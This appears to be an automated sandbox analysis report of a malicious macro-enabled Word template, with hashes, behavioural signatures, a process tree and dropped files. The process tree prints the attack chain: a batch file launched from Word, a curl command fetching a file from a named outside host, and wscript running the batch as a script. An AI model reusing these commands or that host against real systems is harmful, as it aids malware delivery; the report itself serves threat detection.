Analysis
- max time kernel: 146s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17-03-2023 10:19
Behavioral task: behavioral1
- Sample: 451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm
- Resource: win7-20230220-en
Behavioral task: behavioral2
- Sample: 451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm
- Resource: win10v2004-20230220-en
General
- Target: 451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm
- Size: 21KB
- MD5: d382cc7f10fdaec150184941b68cf39e
- SHA1: 48246205890e1ad8b1d8ceb252f2f79ada5d5750
- SHA256: 451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f
- SHA512: edecc7994edc895af26bb7615216316711ea887260b1108a8cc5fb9d747b1d4fb7d97940ebdc68d202aaf9a173686104627f660800ee73c532a2d14096e8c7ba
- SSDEEP: 384:tmtGJQNvuJgxw79kY9+zpfcKl2HnQSB6sx9B3dX:q+QhuJgx6k/52HQSBxx9X
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description / pid / pid_target / process / target process):
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process / 3376 / 3600 / cmd.exe / WINWORD.EXE
- Blocklisted process makes network request (1 IoC)
  Processes (flow / pid / process):
    33 / 1928 / wscript.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes (description / ioc / process):
    Key value queried / \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation / cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description / ioc / process):
    Key opened / \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString / WINWORD.EXE
    Key opened / \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString / WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 6 IoCs)
  Processes (description / ioc / process):
    Key opened / \REGISTRY\MACHINE\Hardware\Description\System\BIOS / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU / WINWORD.EXE
    Key opened / \REGISTRY\MACHINE\Hardware\Description\System\BIOS / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily / WINWORD.EXE
    Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU / WINWORD.EXE
- Modifies registry class (1 IoC)
  Processes (description / ioc / process):
    Key created / \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings / cmd.exe
- NTFS ADS (1 IoC)
  Processes (description / ioc / process):
    File created / C:\Users\Admin\AppData\Local\Temp\~WRD0004.tmp\:Zone.Identifier:$DATA / WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (3 IoCs)
  Processes (pid / process):
    3600 / WINWORD.EXE
    3600 / WINWORD.EXE
    4868 / WINWORD.EXE
- Suspicious use of SetWindowsHookEx (28 IoCs)
  Processes (pid / process):
    3600 / WINWORD.EXE (15 entries)
    4868 / WINWORD.EXE (13 entries)
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description / pid / process / target process):
    PID 3600 wrote to memory of 3376 / 3600 / WINWORD.EXE / cmd.exe
    PID 3600 wrote to memory of 3376 / 3600 / WINWORD.EXE / cmd.exe
    PID 3376 wrote to memory of 2968 / 3376 / cmd.exe / mode.com
    PID 3376 wrote to memory of 2968 / 3376 / cmd.exe / mode.com
    PID 3376 wrote to memory of 2740 / 3376 / cmd.exe / curl.exe
    PID 3376 wrote to memory of 2740 / 3376 / cmd.exe / curl.exe
    PID 3376 wrote to memory of 4868 / 3376 / cmd.exe / WINWORD.EXE
    PID 3376 wrote to memory of 4868 / 3376 / cmd.exe / WINWORD.EXE
    PID 3376 wrote to memory of 1928 / 3376 / cmd.exe / wscript.exe
    PID 3376 wrote to memory of 1928 / 3376 / cmd.exe / wscript.exe
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Uses Volume Shadow Copy WMI provider
  The Volume Shadow Copy service is used to manage backups/snapshots.
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (process tree, depth shown by indentation)
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm" /o ""
  Signatures:
    - Checks processor information in registry
    - Enumerates system info in registry
    - NTFS ADS
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat
    Signatures:
      - Process spawned unexpected child process
      - Checks computer location settings
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\mode.com
      Command line: mode 15,1
    - C:\Windows\system32\curl.exe
      Command line: curl -o "C:\Users\Admin\AppData\Local\Temp\temp.docx" http://eum-it.co.kr/gnuboard4/bbs/img/upload/temp.docx
    - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\temp.docx" /o ""
      Signatures:
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of SetWindowsHookEx
    - C:\Windows\system32\wscript.exe
      Command line: wscript.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat?.wsf"
      Signatures:
        - Blocklisted process makes network request
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal
  Filesize: 8KB
  MD5: 233e91d650ffd99eccc7f8a742d79eb3
  SHA1: 0bbe6636a6a680b84d968b01d0a0ad2f4882c395
  SHA256: 3e236b93ca038025e168d9ef4c574d29b9152d6b4dbf11b877ac7244544ef818
  SHA512: 8dbe559d6ce90033fe1a3f4263f66ef9c8ed461a1a7b4bf5e76e762c8194461e27edc00b3324b953299b5cb7329d6a8d6c53e10db2b3e8c35282f4e89d173b63
- C:\Users\Admin\AppData\Local\Temp\temp.docx
  Filesize: 1KB
  MD5: 467ff0b53d41344aa0fbed2df4b25582
  SHA1: 0c910f3303865ad0813d31253fe4e2f1b7dc5a03
  SHA256: 15363ec11808c03d6b535861011059b30bd133128f22084b0308b72b59eb76f5
  SHA512: eb366f2cbd74c0d7b4bf9e4dbaf6bb5240982ab833966f2f4a0df0af3984da6b0fbdb9e50332451ba5f5015c5f16efe02d1ce87d1daf8fe7ed95cb1c6df3441e
- C:\Users\Admin\AppData\Local\Temp\~WRD0004.tmp
  Filesize: 28KB
  MD5: 1bc9ac73a2fc0e857c48c385489b6bb0
  SHA1: 5305c28e86e2c2e757c41a036aad93be76522268
  SHA256: 294b5d83a673cfac8f8ccd8aeb2bca53f0dce48cc3152a7e92c8f23dc61562b9
  SHA512: 55d18ce9cd148105a3b67f03bc91c1d90cdf2cfe8c2ec8c344db8cc7237e8620c41a1691ae9c68291d4e0f58e50ff1c918129000d30c4e5c4d786422651d3612
- C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Filesize: 251B
  MD5: 31711792923ed8eab176838f4b8744c9
  SHA1: 08be0cd5967f3aa6828aa0ea71762488d94a240d
  SHA256: d046094fb9162cd9a31afca4324007f5acb95f64065a263949b366a4713061c1
  SHA512: 2b6f566e7d7a8ec6f9a29ad246fa13a405128854748a40f36bc658b044f1b4f8acd1c42f16683fe702d7de3b409e57a6ce7aa00291d03147ef97cd6e9a6560eb
- C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat
  Filesize: 393B
  MD5: 799be50c3436086b45b9e9071243aa59
  SHA1: b3f67263e783ffd08fabcb0979ac983c4e1e11ed
  SHA256: e762f82693c8b83bac6903db41198429078d50413a319ddb7b3a056ff17e8c1f
  SHA512: 1c554704f8627fd0ea7294422824527b495cd2dde1ec3a496befb00d3121e31ab1b836b56d81edd2d3c4ac5d2f46d7ebe794864b4be0f6740ac381fba8c54987
- Memory dumps (Filesize: 64KB each)
  memory/3600-136-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp
  memory/3600-139-0x00007FFB9A930000-0x00007FFB9A940000-memory.dmp
  memory/3600-138-0x00007FFB9A930000-0x00007FFB9A940000-memory.dmp
  memory/3600-137-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp
  memory/3600-133-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp
  memory/3600-135-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp
  memory/3600-134-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp